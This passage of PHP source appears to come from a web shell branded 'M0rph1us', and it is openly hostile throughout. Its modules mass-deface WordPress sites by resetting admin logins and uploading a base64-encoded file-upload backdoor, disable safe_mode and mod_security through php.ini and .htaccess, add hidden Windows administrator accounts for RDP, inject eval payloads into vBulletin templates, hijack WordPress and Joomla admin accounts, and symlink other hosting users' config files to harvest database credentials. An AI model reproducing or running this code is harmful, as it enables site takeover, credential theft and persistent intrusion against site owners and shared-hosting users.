1719. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1720. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1721. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1722. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1723. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1724. $data = curl_exec($ch);
1725. curl_close($ch);
1726. return $data;
1727. }
1728. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1729. $post = array(
1730. "log" => "$userr",
1731. "pwd" => "$pass",
1732. "rememberme" => "forever",
1733. "wp-submit" => "$wp_submit",
1734. "redirect_to" => "$web",
1735. "testcookie" => "1",
1736. );
1737. $ch = curl_init($cek);
1738. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1739. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1740. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1741. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1742. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1743. curl_setopt($ch, CURLOPT_POST, 1);
1744. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1745. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1746. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1747. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1748. $data = curl_exec($ch);
1749. curl_close($ch);
1750. return $data;
1751. }
1752. $link = explode("\r\n", $_POST['link']);
1753. $script = htmlspecialchars($_POST['script']);
1754. $user = "M0rph1us";
1755. $pass = "M0rph1us";
1756. $passx = md5($pass);
1757. foreach($link as $dir_config) {
1758. $config = anucurl($dir_config);
1759. $dbhost = ambilkata($config,"DB_HOST', '","'");
1760. $dbuser = ambilkata($config,"DB_USER', '","'");
1761. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1762. $dbname = ambilkata($config,"DB_NAME', '","'");
1763. $dbprefix = ambilkata($config,"table_prefix = '","'");
1764. $prefix = $dbprefix."users";
1765. $option = $dbprefix."options";
1766. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1767. $db = mysql_select_db($dbname);
1768. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1769. $result = mysql_fetch_array($q);
1770. $id = $result[ID];
1771. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1772. $result2 = mysql_fetch_array($q2);
1773. $target = $result2[option_value];
1774. if($target == '') {
1775. echo "[-] <font color=red>error, could not take his domain name</font><br>";
1776. } else {
1777. echo "[+] $target <br>";
1778. }
1779. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1780. if(!$conn OR !$db OR !$update) {
1781. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1782. mysql_close($conn);
1783. } else {
1784. $site = "$target/wp-login.php";
1785. $site2 = "$target/wp-admin/theme-install.php?upload";
1786. $b1 = anucurl($site2);
1787. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1788. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1789. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1790. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1791. $www = "m.php";
1792. $fp5 = fopen($www,"w");
1793. fputs($fp5,$upload3);
1794. $post2 = array(
1795. "_wpnonce" => "$anu2",
1796. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1797. "themezip" => "@$www",
1798. "install-theme-submit" => "Install Now",
1799. );
1800. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1801. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1802. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1803. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1804. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1805. curl_setopt($ch, CURLOPT_POST, 1);
1806. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1807. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1808. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1809. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1810. $data3 = curl_exec($ch);
1811. curl_close($ch);
1812. $y = date("Y");
1813. $m = date("m");
1814. $namafile = "id.php";
1815. $fpi = fopen($namafile,"w");
1816. fputs($fpi,$script);
1817. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1818. curl_setopt($ch6, CURLOPT_POST, true);
1819. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1820. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1821. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1822. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1823. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1824. $postResult = curl_exec($ch6);
1825. curl_close($ch6);
1826. $as = "$target/k.php";
1827. $bs = anucurl($as);
1828. if(preg_match("#$script#is", $bs)) {
1829. echo "[+] <font color='lime'>Manage...</font><br>";
1830. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1831. } else {
1832. echo "[-] <font color='red'>Error...</font><br>";
1833. echo "[!!] Just Try Manual: <br>";
1834. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1835. echo "[+] username: <font color=lime>$user</font><br>";
1836. echo "[+] password: <font color=lime>$pass</font><br><br>";
1837. }
1838. mysql_close($conn);
1839. }
1840. }
1841. } else {
1842. echo "<center><h1 class='titulo'>WordPress Auto Deface V.2</h1>
1843. <form method='post'>
1844. Link Config: <br>
1845. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1846. <input type='text' name='script' height='10' size='50' placeholder='Hacked By M0RPH1US' required><br>
1847. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Deface!!'>
1848. </form></center>";
1849.  
1850. footer(); }
1851. }
1852.  
1853. // WP AUTO DEF 2 //
1854.  
1855.  
1856.  
1857. // BYPASS SAFEMODE //
1858.  
1859. elseif($_GET['do'] == 'bypasssafemode') {
1860.  
1861. echo '<center><h2 class="titulo"> SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS </h1><br><p1>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir</p1><br>PHP.INI<br>
1862. <form method="post"><input type="submit" value="php.ini" name="phpini"></form>
1863. <br>
1864. .HTACCESS MOD <br><form method="post"><input type="submit" value=".htaccess" name="htaccessmod"></form><br>.HTACCESS MOD (PERL)<br><form method="post"><input type="submit" value=".htaccess(perl)" name="htaccessperl"></form><br>';
1865.  
1866. if(isset($_POST['phpini'])){
1867. $phpini = "safe_mode=OFF\ndisable_functions=NONE\nsafe_mode_gid=OFF\nopen_basedir=OFF\nallow_url_fopen=ON";
1868. $M0rph1usphp = fopen($GLOBALS['cwd']."php.ini", "w");
1869. fwrite($M0rph1usphp, $phpini);
1870. fclose($M0rph1usphp);
1871. }
1872. if(isset($_POST['htaccessmod'])){
1873. $htmod = "<IfModule mod_security.c>\nSecFilterEgine Off\nSecFilterScanPOST Off\nSecFilterCheckURLEncoding Off\nSecFilterCheckUnicodeEncoding Off\n</IfModule>";
1874. $M0rph1usmod = fopen($GLOBALS['cwd'].".htaccess", "w");
1875. fwrite($M0rph1usmod, $htmod);
1876. fclose($M0rph1usmod);
1877. }
1878. if(isset($_POST['htaccessperl'])){
1879. $htperl = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .sh\nAddHandler cgi-script .pl\nAddHandler cgi-script .pl";
1880. $M0rph1usperl = fopen($GLOBALS['cwd'].".htaccess", "w");
1881. fwrite($M0rph1usperl, $htperl);
1882. fclose($M0rph1usperl);
1883.  
1884. footer(); }
1885.  
1886. }
1887.  
1888. // END BYPASS SAFEMODE //
1889.  
1890. // KRDP SHELL //
1891.  
1892.  
1893. elseif($_GET['do'] == 'krdp_shell') {
1894. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1895. if($_POST['create']) {
1896. $user = htmlspecialchars($_POST['user']);
1897. $pass = htmlspecialchars($_POST['pass']);
1898. if(preg_match("/$user/", exe("net user"))) {
1899. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Available Already</font>";
1900. } else {
1901. $add_user = exe("net user $user $pass /add");
1902. $add_groups1 = exe("net localgroup Administrators $user /add");
1903. $add_groups2 = exe("net localgroup Administrator $user /add");
1904. $add_groups3 = exe("net localgroup Administrateur $user /add");
1905. echo "[ RDP ACCOUNT INFO ]<br>
1906. ------------------------------<br>
1907. IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
1908. Username: <font color=lime>$user</font><br>
1909. Password: <font color=lime>$pass</font><br>
1910. ------------------------------<br><br>
1911. [ STATUS ]<br>
1912. ------------------------------<br>
1913. ";
1914. if($add_user) {
1915. echo "[add user] -> <font color='lime'>Success!</font><br>";
1916. } else {
1917. echo "[add user] -> <font color='red'>Error!</font><br>";
1918. }
1919. if($add_groups1) {
1920. echo "[add localgroup Administrators] -> <font color='lime'>Success!</font><br>";
1921. } elseif($add_groups2) {
1922. echo "[add localgroup Administrator] -> <font color='lime'>Success!</font><br>";
1923. } elseif($add_groups3) {
1924. echo "[add localgroup Administrateur] -> <font color='lime'>Success!</font><br>";
1925. } else {
1926. echo "[add localgroup] -> <font color='red'>Error!</font><br>";
1927. }
1928. echo "------------------------------<br>";
1929. }
1930. } elseif($_POST['s_opsi']) {
1931. $user = htmlspecialchars($_POST['r_user']);
1932. if($_POST['opsi'] == '1') {
1933. $cek = exe("net user $user");
1934. echo "Checking username <font color=lime>$user</font> ....... ";
1935. if(preg_match("/$user/", $cek)) {
1936. echo "[ <font color=lime>Available Already!</font> ]<br>
1937. ------------------------------<br><br>
1938. <pre>$cek</pre>";
1939. } else {
1940. echo "[ <font color=red>Not Available!</font> ]";
1941. }
1942. } elseif($_POST['opsi'] == '2') {
1943. $cek = exe("net user $user M0rph1uspirates");
1944. if(preg_match("/$user/", exe("net user"))) {
1945. echo "[change password: <font color=lime>mhph</font>] -> ";
1946. if($cek) {
1947. echo "<font color=lime>Success!</font>";
1948. } else {
1949. echo "<font color=red>Error!</font>";
1950. }
1951. } else {
1952. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Not Available!</font>";
1953. }
1954. } elseif($_POST['opsi'] == '3') {
1955. $cek = exe("net user $user /DELETE");
1956. if(preg_match("/$user/", exe("net user"))) {
1957. echo "[remove user: <font color=lime>$user</font>] -> ";
1958. if($cek) {
1959. echo "<font color=lime>Success!</font>";
1960. } else {
1961. echo "<font color=red>Error!</font>";
1962. }
1963. } else {
1964. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Not Available!</font>";
1965. }
1966. } else {
1967. //
1968. }
1969. } else {
1970. echo "<center><h1 class='titulo'>Create RDP</h1><br>
1971. <form method='post'>
1972. <input type='text' name='user' placeholder='username' value='mhph' required>
1973. <input type='text' name='pass' placeholder='password' value='M0rph1us' required>
1974. <input type='submit' name='create' value='>>'>
1975. </form>
1976. -- Option --<br>
1977. <form method='post'>
1978. <input type='text' name='r_user' placeholder='username' required>
1979. <select name='opsi'>
1980. <option value='1'>Check Username</option>
1981. <option value='2'>Change Password</option>
1982. <option value='3'>Clear Username</option>
1983. </select>
1984. <input type='submit' name='s_opsi' value='>>'>
1985. </form></center>";
1986. }
1987. } else {
1988. echo "<font color=red>This feature can only be used in Windows Server.</font>";
1989.  
1990.  
1991. footer();}
1992.  
1993. }
1994.  
1995. // END KRDP SHELL //
1996.  
1997.  
1998.  
1999. // VB INDEX CHANGER //
2000.  
2001. elseif ($_GET['do'] == 'vbic') {
2002. echo ' <center><h1 class="titulo">VB INDEX CHANGER</h1></center><br>
2003. <form action method="post">
2004. <br><br><br><div align="center">
2005. <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
2006. </div><br>
2007. ';
2008. if (empty($_POST['index'])) {
2009. echo "<center><FORM method=POST>";
2010. echo "<table class=tabnet>
2011. <th colspan=2>Vb Index Changer</th>
2012. <tr><td>host </td><td><input class=inputz type=text size=60 name=localhost value=localhost></td></tr>
2013. <tr><td>database </td><td><input class=inputz type=text size=60 name=database value=forum_vb></td></tr>
2014. <tr><td>username </td><td><input class=inputz type=text size=60 name=username value=user_vb></td></tr>
2015. <tr><td>password </td><td><input class=inputz type=text size=60 name=password value=vb></td></tr>
2016. </tr>
2017. <th colspan=2>Your Index Code</th></table><table class=tabnet>
2018. <TEXTAREA name=index rows=13 style='width: 450px; height: 200px;' border=1 cols=69 name=code>Your Index Code Here...</TEXTAREA><br>
2019. <INPUT class=inputzbut type=submit value=setting name=send>
2020. </FORM></table></center>";
2021. } else {
2022. $localhost = $_POST['localhost'];
2023. $database = $_POST['database'];
2024. $username = $_POST['username'];
2025. $password = $_POST['password'];
2026. $index = $_POST['index'];
2027. @mysql_connect($localhost, $username, $password) or die(mysql_error());
2028. @mysql_select_db($database) or die(mysql_error());
2029. $index = str_replace("'", "'", $index);
2030. $set_index = "{${eval(base64_decode('";
2031. $set_index .= base64_encode("echo "$index";");
2032. $set_index .= "')) }}{${exit() }}</textarea>";
2033. echo ("SET template ='" . $set_index . "' ");
2034. $ok = @mysql_query("SET template ='" . $set_index . "'") or die(mysql_error());
2035. if ($ok) {echo "Update success...<br><br>";}
2036.  
2037.  
2038.  
2039. footer();}
2040. }
2041.  
2042. // END VB INDEX CHANGER //
2043.  
2044.  
2045.  
2046. // WHOIS
2047.  
2048. elseif ($_GET['do'] == 'whois') {
2049. @set_time_limit(0);
2050. @error_reporting(0);
2051. function sws_domain_info($site) {
2052. $getip = @file_get_contents("http://networktools.nl/whois/" . $site);
2053. flush();
2054. $ip = @findit($getip, '<pre>', '</pre>');
2055. return $ip;
2056. flush();
2057. }
2058. function sws_net_info($site) {
2059. $getip = @file_get_contents("http://networktools.nl/asinfo/" .$site);
2060. $ip = @findit($getip, '<pre>', '</pre>');
2061. return $ip;
2062. flush();
2063. }
2064. function sws_site_ser($site) {
2065. $getip = @file_get_contents("http://networktools.nl/reverseip/" .$site);
2066. $ip = @findit($getip, '<pre>', '</pre>');
2067. return $ip;
2068. flush();
2069. }
2070. function sws_sup_dom($site) {
2071. $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=" . $site . "&Search+subdomains=Find+subdomains");
2072. $ip = @findit($getip, '<strong>Nameservers found:</strong>', '<script type="text/javascript">');
2073. return $ip;
2074. flush();
2075. }
2076. function sws_port_scan($ip) {
2077. $list_post = array('80', '21', '22', '2082', '25', '53', '110', '443', '143');
2078. foreach ($list_post as $o_port) {
2079. $connect = @fsockopen($ip, $o_port, $errno, $errstr, 5);
2080. if ($connect) {
2081. echo ' $ip : ' . $o_port . ' ??? <u style="color: white">Open</u> <br /><br />';
2082. flush();
2083. }
2084. }
2085. }
2086. function findit($mytext, $starttag, $endtag) {
2087. $posLeft = @stripos($mytext, $starttag) + strlen($starttag);
2088. $posRight = @stripos($mytext, $endtag, $posLeft + 1);
2089. return @substr($mytext, $posLeft, $posRight - $posLeft);
2090. flush();
2091. }
2092. echo '<center><h1 class="titulo">WHOIS</h1>';
2093. echo '<br />
2094. <div class="sc"><form method="post"><table>
2095. <tr><th colspan="5" style="border: 2px lime dotted;">Whois Site</th></tr>
2096. <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:white;" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:white;background-color:#000000" name="scan" value="Scan !" /></td></tr>
2097. </table></form></div>';
2098. if (isset($_POST['scan'])) {
2099. $site = @htmlentities($_POST['site']);
2100. if (empty($site)) {
2101. die('<br /><br /> Not add IP .. !');
2102. }
2103. $ip_port = @gethostbyname($site);
2104. echo "<br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
2105. <div class='tit'> <br /><br />|-------------- Port Server ------------------| <br /></div>
2106. <div class='ru'> <br /><br /><pre>";
2107. echo "~" . sws_port_scan($ip_port) . " </pre></div> ";
2108. flush();
2109. echo '<div class="tit"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
2110. <div class="ru">
2111. <pre>' . sws_domain_info($site) . '</pre></div>';
2112. flush();
2113. echo '<div class="tit"> <br /><br />|-------------- Network Info ------------------| <br /></div>
2114. <div class="ru">
2115. <pre>'.sws_net_info($site).'</pre> </div>';
2116. flush();
2117. echo '<div class="tit"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
2118. <div class="ru">
2119. <pre>'.sws_sup_dom($site).'</pre> </div>';
2120. flush();
2121. echo '<div class="tit"> <br /><br />|-------------- Site Server ------------------| <br /></div>
2122. <div class="ru">
2123. <pre>'.sws_site_ser($site).'</pre> </div>
2124. <div class="tit"> <br /><br />|-------------- END ------------------| <br /></div>';
2125. flush();
2126. }
2127. echo '</center>';
2128.  
2129. footer();}
2130.  
2131.  
2132. // END WHOIS //
2133.  
2134. // WP AUTO EDIT USER //
2135.  
2136. elseif($_GET['do'] == 'wpautouser') {
2137. if($_POST['gass']) {
2138. echo "<center><h1 class='titulo'>WordPress Auto Change User 2</h1>
2139. <form method='post'>
2140. Link Config: <br>
2141. <textarea name='link' style='width: 450px; height:250px;'>";
2142. UrlLoop($_POST['linkconf'],'wordpress');
2143. echo"</textarea><br>
2144. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Submit'>
2145. </form></center>";
2146. } else {
2147. echo "<center><h1 class='titulo'>WordPress Auto Change User 2</h1>
2148. <form method='post'>
2149. Link Config: <br>
2150. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/M0rph1us_sym/'><br>
2151. <input type='submit' style='width: 450px;' name='gass' value='Submit'>
2152. </form></center>";
2153. }
2154. if($_POST['auto_cu_wp']) {
2155.  
2156. function anucurl($sites) {
2157. $ch = curl_init($sites);
2158. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2159. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2160. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2161. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2162. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2163. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2164. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2165. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2166. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2167. $data = curl_exec($ch);
2168. curl_close($ch);
2169. return $data;
2170. }
2171. $link = explode("\r\n", $_POST['link']);
2172. $user = "M0rph1us";
2173. $pass = "M0rph1us";
2174. $passx = md5($pass);
2175. foreach($link as $dir_config) {
2176. $config = anucurl($dir_config);
2177. $dbhost = ambilkata($config,"DB_HOST', '","'");
2178. $dbuser = ambilkata($config,"DB_USER', '","'");
2179. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2180. $dbname = ambilkata($config,"DB_NAME', '","'");
2181. $dbprefix = ambilkata($config,"table_prefix = '","'");
2182. $prefix = $dbprefix."users";
2183. $option = $dbprefix."options";
2184. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2185. $db = mysql_select_db($dbname);
2186. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2187. $result = mysql_fetch_array($q);
2188. $id = $result[ID];
2189. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2190. $result2 = mysql_fetch_array($q2);
2191. $target = $result2[option_value];
2192. if($target == '') {
2193. echo "[-] <font color=red>error, can not take its domain name</font><br>";
2194. } else {
2195. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
2196. }
2197. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2198. if(!$conn OR !$db OR !$update) {
2199. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2200. mysql_close($conn);
2201. } else {
2202. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2203. echo "[+] username: <font color=lime>$user</font><br>";
2204. echo "[+] password: <font color=lime>$pass</font><br><br>";
2205.  
2206. mysql_close($conn);
2207.  
2208. footer();}
2209.  
2210. }
2211. }
2212. }
2213.  
2214. // END WP AUTO CHANGE USER //
2215.  
2216.  
2217. // JOOMLA AUTO CHANGE USER //
2218.  
2219. elseif($_GET['do'] == 'autojoomla') {
2220. if($_POST['gass']) {
2221. echo "<center><h1 class='titulo'>Joomla Auto Change User 2</h1>
2222. <form method='post'>
2223. Link Config: <br>
2224. <textarea name='link' style='width: 450px; height:250px;'>";
2225. UrlLoop($_POST['linkconf'],'joomla');
2226. echo"</textarea><br>
2227. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
2228. </form></center>";
2229. } else {
2230. echo "<center><h1 class='titulo'>Joomla Auto Change User 2</h1>
2231. <form method='post'>
2232. Link Config: <br>
2233. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/M0rph1us_sym/'><br>
2234. <input type='submit' style='width: 450px;' name='gass' value='Submit!!'>
2235. </form></center>";
2236. }
2237. if($_POST['auto_cu_joomla']) {
2238.  
2239. function anucurl($sites) {
2240. $ch = curl_init($sites);
2241. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2242. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2243. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2244. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2245. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2246. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2247. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2248. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2249. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2250. $data = curl_exec($ch);
2251. curl_close($ch);
2252. return $data;
2253. }
2254. $link = explode("\r\n", $_POST['link']);
2255. $user = "M0rph1us";
2256. $pass = "M0rph1us";
2257. $passx = md5($pass);
2258. foreach($link as $dir_config) {
2259. $config = anucurl($dir_config);
2260. $dbhost = ambilkata($config,"host = '","'");
2261. $dbuser = ambilkata($config,"user = '","'");
2262. $dbpass = ambilkata($config,"password = '","'");
2263. $dbname = ambilkata($config,"db = '","'");
2264. $dbprefix = ambilkata($config,"dbprefix = '","'");
2265. $prefix = $dbprefix."users";
2266. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2267. $db = mysql_select_db($dbname);
2268. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2269. $result = mysql_fetch_array($q);
2270. $id = $result['id'];
2271. $site = ambilkata($config,"sitename = '","'");
2272. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
2273. echo "Config => ".$dir_config."<br>";
2274. echo "CMS => Joomla<br>";
2275. if($site == '') {
2276. echo "Sitename => <font color=red>error, could not get its domain name</font><br>";
2277. } else {
2278. echo "Sitename => $site<br>";
2279. }
2280. if(!$update OR !$conn OR !$db) {
2281. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2282. } else {
2283. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
2284. }
2285. mysql_close($conn);
2286.  
2287. footer(); }
2288. }
2289. }
2290.  
2291. // END JOOMLA AUTO CHANGE USER
2292.  
2293.  
2294. // SYMLINK HARD //
2295.  
2296. elseif($_GET['do'] == 'symconfig') {
2297. if(strtolower(substr(PHP_OS, 0, 3)) == 'win'){
2298. echo "<font color='red'>This feature is Not Windows Server!</font>";
2299. echo '<script>alert("Skid this won\'t work on Windows")</script>';
2300. exit;
2301. }else{
2302. echo "<center><h1 class='titulo'>SYM/CONFIG 2</h1></center><br>";
2303. if($_POST["m"] && !$_POST["passwd"]==""){
2304. @mkdir("M0rph1us_sym", 0777);
2305. @chdir("M0rph1us_sym");
2306. @symlink("/","root");
2307. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex M0rph1us.htm\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any";
2308. @file_put_contents(".htaccess",$htaccess);
2309. $etc_passwd=$_POST["passwd"];
2310. $etc_passwd=explode("\n",$etc_passwd);
2311. foreach($etc_passwd as $passwd){
2312. $pawd=explode(":",$passwd);
2313. $user =$pawd[0];
2314.  
2315. @symlink('/','M0rph1us_sym/root');
2316. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
2317. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
2318. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
2319. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
2320. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
2321. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
2322. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
2323. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
2324. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
2325. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
2326. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
2327. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
2328. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
2329. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
2330. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
2331. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
2332. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2333. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2334. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2335. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2336. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2337. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2338. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2339. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2340. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2341. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2342. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2343. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2344. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2345. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2346. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2347. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2348. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2349. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2350. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2351. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2352. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2353. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2354. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2355. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2356. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2357. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2358. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2359. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
